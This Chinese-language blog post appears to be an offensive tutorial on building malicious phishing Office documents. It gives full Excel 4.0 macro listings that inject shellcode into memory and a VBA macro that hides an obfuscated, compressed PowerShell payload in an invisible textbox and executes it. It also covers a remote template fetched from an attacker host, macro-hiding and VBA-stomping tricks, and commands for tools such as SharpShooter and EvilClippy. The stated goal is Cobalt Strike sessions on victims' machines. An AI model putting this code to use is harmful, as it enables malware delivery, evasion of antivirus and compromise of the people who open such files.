之前写过类似的钓鱼文档的文章,今天再来水一篇,希望能对大家有所帮助。
一、XLM Macro(Excel 4.0)
与一般的office文档不同的是,其格式为XLM,不同于其他的XML,XLM被创建于1992年,比VBA还要早出很多。
下面我们看一个简单的demo:
这项技术在2018年,在这个文章中被指出:https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/
由此也衍生出了很多的相关项目,比如(Excel4-DCOM:https://github.com/outflanknl/Excel4-DCOM):
language
Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
其也是依靠XLM的来调用win32API来实现远程线程注入:
SharpShooter:https://github.com/mdsecactivebreach/SharpShooter 利用该工具创建XLS Macro的方法如下:
language
SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee
生成的SLK文件如下:
原理基本类似。不过这种都是基于X86的,X64有一些问题,有一篇文章(https://www.cybereason.com/blog/excel4.0-macros-now-with-twice-the-bits)介绍了该问题。
最后衍生的工具:https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a
也就是在x64中使用QueueUserAPC来进行注入。
当然还有很多相关的工具(Macrome:https://github.com/michaelweber/Macrome、EXCELntDonut:https://github.com/FortyNorthSecurity/EXCELntDonut)等等。
进程注入
在XLS中支持win32的调用,也就意味着我们可以进行进程注入等操作。调用方式如下:
language
REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)
需要注意的是,区分x86与x64,x86的demo如下:
```vba
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=Valloc(0,65536,4096,64)
=SELECT(B1:B999,B1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"excel")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=CThread(0,0,A10,0,0,0)
=HALT()
```
x64demo如下:
vba
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=WHILE(A22=0)
=SET.VALUE(A22,Valloc(A21,65536,12288,64))
=SET.VALUE(A21,A21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=SELECT(C1:C3479,C1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"EXCEL")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=RTL(A22+(D1*10),ACTIVE.CELL(),LEN(ACTIVE.CELL()))
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=Queue(A22,-2,0)
=Go()
=SET.VALUE(A22,0)
=HALT()
这里方便起见直接使用EXCELntDonut来生成。使用Cs生成shellcode,然后替换到指定位置:
然后运行:
language
EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll
然后将数据插入,并处理
然后执行即可。可惜测试时一直失败。
Evasion
效果相等:
宏隐藏(https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/b9ec509a-235d-424e-871d-f8e721106501):
即改成02
此时已无法显示隐藏:
EPPLUS:EPPlus 5-Excel spreadsheets for .NET
EPPLUS是一个用来生成Excel的.net库。https://github.com/EPPlusSoftware/EPPlus
利用该程序可以更改的免杀excel,demo:https://github.com/FortyNorthSecurity/hot-manchego
用法:
language
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs
hot-manchego.exe blank.xlsm vba.txt
执行宏,获取Cs会话。
二、powerpoint
这种攻击则利用的是鼠标轨迹来进行操作,比如鼠标点击、鼠标移动等。操作如下:
插入Cs生成的hta文件。点击时,
Cs上线。
三,远程加载文档
每一个文档都是一个zip文件,解压,编辑
修改为:
language
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://192.168.1.106/1.dotm" TargetMode="External"/>
此时打开文档,运行宏即可上线。
四,控件
```vba
Sub Main()
On Error Resume Next
createTextBoxs
ExecuteTextBoxCommands
End Sub
Sub createTextBoxs()
On Error Resume Next
Dim objTextBox As Shape
Dim secretkey As Long
Dim str As String
Dim zHf As String
Dim payload As String
payload = "H4sIAAAAAAAAAK1WaW/iShb9nPwKf4gEKCQBs4U3ivQAYzDGxmA2kxdFZbuAMuWtvGDzpv/7lA2k09PpmZZmkJCr7LucOnepq8Lw"
payload = payload + "QQ0JMkLJNSHzsIQkQK7DsLe328gxwmydLd53MHz3iGu8A9MkMAiYv29vFECAzRTvYkDebdeMMCwz+SYThGZEYOnm5vYmfxU5AdjC"
payload = payload + "dweEKIbvNgz3rhkwL0zxteN5nGsD5Lz98UcvIgQ64Xn/OIBhJwigrWMEg2KJ+Sez2kMCHya6BY2Q+Zu5e38cYFcH+CKW9oCxp6fo"
payload = payload + "OGb2bewaIDvBo+phFBYLf/1VKL0+VN8e+34EcFAsqGkQQvvRxLhQYr6VMofz1IPFgoQM4gbuNnxcIafGPi5y9HIOXjpjL5QuJ9t5"
payload = payload + "gJ7j14fMrJ51igW6VCg3nTOHhTLzmvl7fXtj/vxAM4ucENnwUXBCSFxPhSRGBgweh8AxMZzBLVUrBDRmzq5QoiAIDCPiMFcsVC92"
payload = payload + "D7B450QYl6nd19+1+1aU4fFK7u8qFT8rUSklJKXyJSd+hw4pz5uzOXqcn9B/Sq4S/f2UYKXbb1+lqgkx3IEQvoeU30+5entz85ov"
payload = payload + "IT1PUXEDlOu9MJUyI1EQIHRJmoVzTiJYevsen7Pbq2ZQ/qWh6lXronMOzxnHC/O6dJH5dntTur1kT/b+XY8QNiHJvv+6Gji4RQ7k"
payload = payload + "UgfYyLgmfPGrmMEthjkfj1cxmeIsFi4foMld2ClkhL7+rNa3Ufih2z2D6xg07gFFRVOi9COYcwyLBcGRoE35O+9pmt5taZnBq/Sl"
payload = payload + "tNKr92yf5XIPgyAoM0pE69woMyoEGJplpuME6PKpE4Vuvix8hytFOEQGCMKrubfSF5ReXPdch1ZMZNDoUhrmqgcNBHDGSpkZIhN2"
payload = payload + "UxXtrhAKX3LSAxjTkqOWYhoT+ibjQg2znCFm+d/zo/SowlCwPQxtKp13IR6DHe05l4rK0w3soFn4D7CvdXIuioyrK0mfQNMEULEb"
payload = payload + "lpklIiHta4XyT4n3v8H7scX8ALNH4CWQxbwQhS1t6OcuQNkJ0Ik2Y+gzz6WsBF+7aZjVUm7GyK6blw+ic1pJSJV44tpdEMBmXc17"
payload = payload + "XLFQY6Nd0lbGzVSyBHaUao6cGM6S9GN+AJr7ZMpGrjEPiT/sc3Q/M9ggwAPs6fuxD5KxZSXt3jrtKx12jJqogYRo3D05PDJsqjed"
payload = payload + "uNqsTYRY5l0ctMQev1oAZPm5r8iuV80+SMcno7knExa62lH2hVjpmKvYaNqiyzdDqruM+pFH+tFE0aKxP7YFVN/H3DIcxcLgeSiy"
payload = payload + "GnjGegvm+qaf+dL8XQyy/amd7ZHfgyTzo1H2Ya3ahKtRS3M8BFfR7nSUkWGeOMiO6PvIlQwvqMknY3s4WMCrLtRDVZwvNmvKTRX4"
payload = payload + "hNebRNU8HC87i0NN2ZAcW8xTjHKGExns6KR5h4259Ps1RRcWQ0z8aITsp2kqpBcZe5Sqapc+xY0p+s8N88SmQ68OmgRRThPqp5Xx"
payload = payload + "aywCS1hNHGPNI9vYs9zMMtp25Dco7vpQHonrhPjhiPgx9hsTxchw53qZ/LSOJ1Uq7+vWWAT3ApIs0D4FYxHG2TpVODFJBUt4jrqZ"
payload = payload + "HjdIsL48WF61Dpsjh8XTNteWoCfaUjxTm7Mu6K6T+27aHyxUMx0kHW4trp86+nbnBq2DI3X1eijMOi2LsLzJpz01RYcnvD7E7Hij"
payload = payload + "zPGgsmhMogrkYCqzi/5mxtmj/uxQXQ+mcjTnsTivtHtcV5P7R2k87SeTRWW0Vg+8MtvvON3p+pudBLiZpHVqMxoPU1ryHU5fGxw/"
payload = payload + "raiDjlxbLLxhZu9sw41EVe6tZ5u+IE3WvV2j20Lb0xPeWa1D41CVN+0F2R21mWDp3hYE7BE1gHrfirzOXN427bm7ZTdNQYOVJQSg"
payload = payload + "eqqAlup3dhOzJ676+/V4IdaaRnP69BwYadVSWEGdP8faUF7K4ux5GRw30ugETZ+7r7DcWtr5glLbhEHYqlYPykwTLHmkVO6TrZxU"
payload = payload + "HWEyu190h9I8iWuidtQAqVQr3LY+8AbcsO1BzK0XVb/fdNd7rr6vI3u8DFvjCm0fdrNXc+yFtnna1FyV666D8XxUG+0loOimtrfm"
payload = payload + "aNDg96fB0FdOvUa9Fh/1+kpqrCSho1U7w+kgGdvyuj4YidOBYGlebY5dvnrOaX9Dc5XWqKgLp6xWRaDlNStuYN08JuGJBa3u0RhE"
payload = payload + "fkL/FZqT9ysqe8xkfJ+leS3pK/9I8xo0OafT1K1lY8n7vRkRoh6te70Ca2ELpJolULvGPTeO5ZZR6wqgT+PJzwK5v6uo/WRhGcg3"
payload = payload + "5ruXl7xVbl1Cp58kmyj+wdDnAw6Zj4ZH2xxtr9n7+/u8Jd58fHq9S96uY+TH/kFPqLla4/bm23VeiMGnrvmr6UwCJNgDTLspnbCu"
payload = payload + "9yPvEv4yJykuyjSKxa9H+wMkDsR07KWD8fVW6WDsGtlk94sR68+Pvk9vzwVd1tgvV6XvF0SpdL369Gi7zcefyxGvU+D3q2RDz1f+"
payload = payload + "ROQYOrtwX2YqSa1SqWTPeoVa+31ieq6XFj/slbP57xOUz65w7upjYCORY8P/Ywx+8Prf2c34y2fI7+zliL6mLLuU/wU5qB694w0A"
payload = payload + "AA=="
zHf = " -NoP -NonI -Command ""Invoke-"
zHf = zHf + "Expression $(New-Object IO.StreamReader ($(New-O"
zHf = zHf + "bject IO.Compression.DeflateStream ($(New-Object"
zHf = zHf + " IO.MemoryStream (,$([Convert]::FromBase64String"
zHf = zHf + "(\"" " & payload & " \"" )))), [IO.Compression.Compr"
zHf = zHf + "essionMode]::Decompress)), [Text.Encoding]::ASCI"
zHf = zHf + "I)).ReadToEnd();Read-Host;"""
secretkey = RGB(1, 33, 7)
Debug.Print "Adding Embedded Command Shape Into Document"
Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0)
With objTextBox
.TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1"
.Name = "Shell.Application"
.Height = 1
.Width = 1
.Visible = msoFalse
.Shadow.Visible = True
.Shadow.ForeColor.RGB = secretkey
If .Shadow.ForeColor.RGB <> secretkey Then
Debug.Print "Fail to set secret key"
End If
Debug.Print "Secret Key For Command Shape: " & CStr(.Shadow.ForeColor.RGB)
.AlternativeText = "ShellExecute"
.TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColor
End With
End Sub
Sub ExecuteTextBoxCommands()
On Error Resume Next
Dim objCmdShape As Shape
Dim secretkey As Long
Dim cmdParams() As String
Dim cmdCommand As String
Dim cmdType As String
Dim cmdObj As Object
secretkey = RGB(1, 33, 7)
For x = 1 To ActiveDocument.Shapes.Count
Set objCmdShape = ActiveDocument.Shapes(x)
If objCmdShape.Shadow.ForeColor.RGB = secretkey Then
Debug.Print "Discovered Command Text Object"
cmdType = objCmdShape.Name
cmdCommand = objCmdShape.AlternativeText
cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|")
Debug.Print "Command Type To Execute: " & cmdType
Debug.Print "Command To Execute: " & cmdCommand
Debug.Print "Command Params to Execute: " & Join(cmdParams, " & ")
Set cmdObj = Interaction.CreateObject(cmdType)
VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), cmdParams(1), cmdParams(2)
objCmdShape.Delete
ActiveDocument.Save
Exit For
End If
Next
End Sub
```
这中攻击手法,没有太神奇的地方,主要就是利用宏去创建一个不可见的控件,然后调用去执行恶意代码。上面给出的代码不可直接使用,需要更改里面的powershell部分,就留给各位读者自行补全了。
五,VBA Stomping
直译过来就是VBA重踏。怎么去理解这个东西呢,比如说我们创建一个基础的VBA代码:
当我们解压该文档,并将其使用0填充时,依旧可以去执行,就行下面这样:
改为:
此时仍然可以使用。
武器化:https://github.com/outflanknl/EvilClippy
编译命令:
language
csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs
使用方法:
language
EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc
这样你便可以得到一个处理好的文档。
总结
上面介绍了一些常见的钓鱼文档的操作,希望能给大家带来帮助,结合使用,效果更加。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论